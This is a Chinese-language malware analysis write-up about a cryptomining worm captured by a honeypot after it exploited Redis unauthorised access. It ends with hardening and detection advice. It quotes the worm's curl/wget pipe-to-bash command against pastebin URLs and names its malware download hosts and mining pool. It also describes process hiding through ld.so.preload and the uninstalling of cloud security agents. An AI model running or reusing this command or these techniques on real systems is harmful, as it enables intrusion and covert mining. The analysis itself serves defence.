2. 程式人生 > >一次Redis未授權訪問漏洞入侵分析

一次Redis未授權訪問漏洞入侵分析

阿新 發佈:2018-11-29

0x00 簡介

通過之前部署的蜜罐系統,我近日在滴滴雲上捕獲到了一個通過 Redis 未授權訪問漏洞進行入侵的蠕蟲樣本,該樣本的特點是使用 Python 指令碼進行橫向漏洞掃描,並且具有程序隱藏和解除安裝某些雲上安全產品的功能。

0x01 樣本分析

通過蜜罐日誌得到攻擊者入侵開始於通過 Redis 寫 crontab:
在這裡插入圖片描述
命令中的 URL https://pastebin.com/raw/1NtRkBc3 其實是一箇中轉,實際樣本檔案為 https://pastebin.com/raw/tRxfvbYN 在 base64 解碼後的結果為:

curl https://pastebin.com/raw/1NtRkBc3

(
 
curl -fsSL https://pastebin.com/raw/tRxfvbYN || wget -q -O- https://pastebin.com/raw/tRxfvbYN)|base64 -d |/bin/bash

解碼後是一個 300+ 行的 shell 指令碼,該指令碼共有 9 個函式:

  • kills:根據關鍵字殺掉其他木馬的程序和檔案
  • system:從 https://pastebin.com/raw/CnPtQ2tM 下載 shell 指令碼到 /bin/httpdns,然後建立定時任務定時執行該指令碼,該指令碼較本樣本多了 init 函式:
    在這裡插入圖片描述
    • 該函式從 https://master.minerxmr.ru/x/1539937106x-1566688371.jpg
      下載可執行檔案到 /usr/sbin/netdns/etc/init.d/netdns,然後使用 chkconfig --add netdns 設定自動啟動,該檔案使用了 UPX 壓縮,解壓之後的內容即為執行 shell 命令下載的樣本:
      在這裡插入圖片描述
  • top:從 https://master.minerxmr.ru/y/1539580368x-1566688371.jpg 下載動態連結庫檔案到 /usr/local/lib/libdns.so,然後將該路徑寫入到 /etc/ld.so.preload,從而使該庫得以在其他可執行檔案執行時被載入,該檔案 hook 了 readdir 這個函式,使其忽略 /proc/kworkerds
    這個程序對應的檔案,從而導致 top 等命令無法檢視到 kworkerds 這個程序,而這個程序就是後面要提到的挖礦主程序:
    在這裡插入圖片描述
    在這裡插入圖片描述
    在這裡插入圖片描述
  • python:使用 Python 解碼並執行一段 base64 資料:
    在這裡插入圖片描述
    • 這段程式碼實際也是為了中轉,最終執行的 Python 程式碼如下:
      在這裡插入圖片描述
      • 該指令碼從 ident.me 獲取 IP 地址並掃描 B 段,這裡需要注意的是,除了掃描 6379 埠的 Redis 未授權訪問,該指令碼還對 8161 埠的 ActiceMQ 任意檔案上傳漏洞(CVE-2016-3088)進行了掃描
  • echocron:建立定時任務,定時下載該樣本:
    在這裡插入圖片描述
  • tables:更改 iptables,僅允許本地訪問 6379 埠,防止其他入侵者繼續入侵:
    在這裡插入圖片描述
  • uninstall:解除安裝阿里雲安騎士和騰訊云云鏡這兩款主機安全產品,由此可見該蠕蟲主要針對目標是國內的雲主機:
    在這裡插入圖片描述
  • downloadrun:下載挖礦檔案並執行:
    在這裡插入圖片描述
    • 可以看到該挖礦檔名稱 kworkerds 即為上面提到的動態庫想要隱藏的程序名。
  • downloadrunxm:從 https://master.minerxmr.ru/y/1540521844x-1404729716.jpg 下載挖礦配置檔案,並且根據機器架構下載不同的挖礦程式並執行,挖礦的礦池地址為 stratum+tcp://x1.minerxmr.ru:56415

各函式的呼叫順序如下:
在這裡插入圖片描述

從上述分析可以看到,這是一個針對 Redis 未授權訪問漏洞的蠕蟲,攻擊者利用 pastebin.com 這種第三方檔案傳輸服務來隱藏自身的位置(雖然後面使用了 ident.me 這個個人域名),使用動態連結庫 hook 來隱藏程序,並且解除安裝了主流主機安全產品,可見入侵手法相對高階並具有針對性。

0x02 安全建議

Redis 未授權訪問漏洞已經是一個常見漏洞,對於攻擊者來說,該漏洞利用門檻低,成功利用後往往能獲取較高許可權,所以已被大量木馬蠕蟲所利用。建議使用者使用以下方式對該漏洞進行防護:

  1. 設定 Redis 只能本機訪問:在 redis.conf 中設定 bind 127.0.0.1
  2. 更改預設埠:在 redis.conf 中設定 port 埠
  3. 設定認證:在 redis.conf 中設定 requirepass 密碼
  4. 在雲控制檯安全組中設定安全組,僅允許指定 IP 訪問 Redis 所在埠
  5. 以低許可權使用者執行 Redis

如果發現漏洞已存在,建議通過以下方法檢查是否已被入侵:

  1. 檢查 crontab 等敏感檔案,對於滴滴雲的使用者來講,可以從主機安全的介面直接看到相關內容:

在這裡插入圖片描述

  1. 下載靜態連結版本的命令檔案比如 lstop 檢視系統狀態。

相關推薦

Redis授權訪問漏洞入侵分析

0x00 簡介 通過之前部署的蜜罐系統,我近日在滴滴雲上捕獲到了一個通過 Redis 未授權訪問漏洞進行入侵的蠕蟲樣本,該樣本的特點是使用 Python 指令碼進行橫向漏洞掃描,並且具有程序隱藏和解除安裝某些雲上安全產品的功能。 0x01 樣本分析 通過蜜罐日誌得到攻擊者入侵開始

Redis 授權訪問漏洞(附Python腳本)

dir for return -s src acl save 密碼 password 0x01 環境搭建 #下載並安裝 cd /tmp wget http://download.redis.io/releases/redis-2.8.17.tar.gz tar xzf r

redis 授權訪問漏洞和防範

redis通過nmap掃描開放redis 6379端口本機安裝redis客戶端,能連接遠端redis數據庫;(redis-cli)本機創建私鑰和公鑰,ssh-keygen -t rsa 一路回車;會在/root/.ssh/下生成私鑰文件id_rsa和公鑰id_rsa.pubredis-cli -h 192.1

Redis 授權訪問漏洞

訪問 分享圖片 文件 process start 溝通 images oauth 使用 公司的服務器被掃出redis相關漏洞,未授權的訪問漏洞!就是應為沒有設置密碼,所以被掃描出漏洞,設置個密碼就完事修改配置文件Redis的配置文件默認在/etc/redis.conf,找到

redis授權訪問漏洞總結

Redis是一個開源的使用ANSI C語言編寫、支援網路、可基於記憶體亦可持久化的日誌型、Key-Value資料庫,並提供多種語言的API。 漏洞介紹: Redis 預設情況下,會繫結在 0.0.0.0:6379,這樣將會將 Redis 服務暴露到公網上,如果在沒有開啟認證的情況下,可以導致任意使用者在可

Redis授權訪問漏洞

  一、漏洞描述和危害   Redis因配置不當可以未授權訪問,被攻擊者惡意利用。   攻擊者無需認證訪問到內部資料,可能導致敏感資訊洩露,黑客也可以惡意執行flushall來清空所有資料。   攻擊者可通過EVAL執行lua程式碼,或通過資料備份功能往磁碟寫入後門檔案

Redis授權訪問漏洞的重現與利用

前言: 最近配置openvas的時候安裝了redis,聽說曾經曝出過一個未授權訪問漏洞,便找了一下相關資料想自己動手復現一下漏洞的利用過程,當然所有的攻擊性操作都是在虛擬機器上完成的,本文所有的操作是在Fedora26上進行的,使用的虛擬機器為Oracle VM Virtu

docker搭建redis授權訪問漏洞環境

rom source mage back star restart file com rst 這是redis未授權訪問漏洞環境,可以使用該環境練習重置/etc/passwd文件從而重置root密碼 環境我已經搭好放在了docker hub 可以使用命令docker se

Redis授權訪問漏洞復現

Redis未授權訪問漏洞復現   一、漏洞描述 Redis預設情況下,會繫結在0.0.0.0:6379(在redis3.2之後,redis增加了protected-mode,在這個模式下,非繫結IP或者沒有配置密碼訪問時都會報錯),如果沒有進行採用相關的策略,比如新增防火牆規則避免其他非信任來源ip

Redis授權訪問及安全組漏洞招致kerberods來挖礦

故障 raw wget 排查 web 查看 授權 現象 use 參考文檔https://www.freebuf.com/articles/web/94237.htmlhttps://www.4hou.com/vulnerable/13843.htmlhttps://lauc

ZooKeeper 授權訪問漏洞

tps blog keep star tmp 服務 datadir pre cfg ZooKeeper 安裝: Zookeeper的默認開放端口是2181 wget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeep

Redis授權訪問反彈shell

shell conf 授權 shel TP edi 10.10 info image Redis未授權訪問反彈shell 目標主機:10.104.11.178 攻擊機:kali 攻擊步驟: 1.與目標主機連接 root@kali:~# /usr/redis/redis-c

你的數據安全麽?Hadoop再曝安全漏洞| 黑客利用Hadoop Yarn資源管理系統授權訪問漏洞

分布式摘要: 4月30日,阿裏雲發現,俄羅斯黑客利用Hadoop Yarn資源管理系統REST API未授權訪問漏洞進行攻擊。 Hadoop是一款由Apache基金會推出的分布式系統框架,它通過著名的 MapReduce 算法進行分布式處理,Yarn是Hadoop集群的資源管理系統。4月30日,阿裏雲發現,俄

Redis授權訪問

總結 AR HR 簡單 mage col 根目錄 IT ros 最近在做校招題目的時候發現有問到未授權訪問,特此搭建了諸多未授權訪問的環境並且一一復現並做簡單總結。再此記錄下來 環境介紹 0x00環境搭建 我這裏用到的是Microsoft(R) Windows(R)

Rsync授權訪問漏洞的利用和防禦

fas 分享圖片 敏感信息泄露 syn name src com 敏感信息 驗證 首先Rsync未授權訪問利用 該漏洞最大的隱患在於寫權限的開啟,一旦開啟了寫權限,用戶就可以,用戶就可以利用該權限寫馬或者寫一句話,從而拿到shell。 我們具體來看配置文件的網相關選項(

墨者學院 - rsync授權訪問漏洞利用

關於rsync語句解釋連結如下 http://man.linuxde.net/rsync   [email protected]:~# rsync -v rsync://ip [email protected]:~# rsync -v rsync:/

rsync授權訪問漏洞利用

rsync常用 文件 技術分享 備份工具 我們 掃描端口 最小 info 方法 漏洞描述:rsync是Linux系統下的數據鏡像備份工具,使用快速增量備份工具Remote Sync可以遠程同步,支持本地復制,或者與其他ssh,rsync主機同步。 漏洞利用:它的默認端口號是

Redis授權訪問詳解

本文作者初入安全行業,入職行業某雲安全公司,得到了職業導師的指點,從基礎入手學習網路安全,此文章是作者復現redis未授權訪問漏洞的筆記,從漏洞介紹—利用方法—日誌分析—安全配置進行深入的分析和學習,僅以此文分享給更多的同樣在路上的安全行業從業者 本篇主要從redis未

Docker Remote Api授權訪問漏洞

一. 漏洞原因 dockerd -H unix:///var/run/docker.sock -H 0.0.0.0:2375 docker守護程序監聽在0.0.0.0,外網可訪問 沒有使用iptables等限制可連線的來源ip 二. 漏洞利用 1.遠

Hadoop&hbase監控頁面授權訪問漏洞處理方案驗證過程實現

Hadoop&hbase監控頁面未授權訪問漏洞處理方案驗證 Hadoop:監控頁面授權登入配置步驟: 1 頁面彈出框授權 1.1頁面彈出框授權配置 1.上傳附件的jar包hadoop-http-auth-e3base.jar到$HADOOP_HOME/s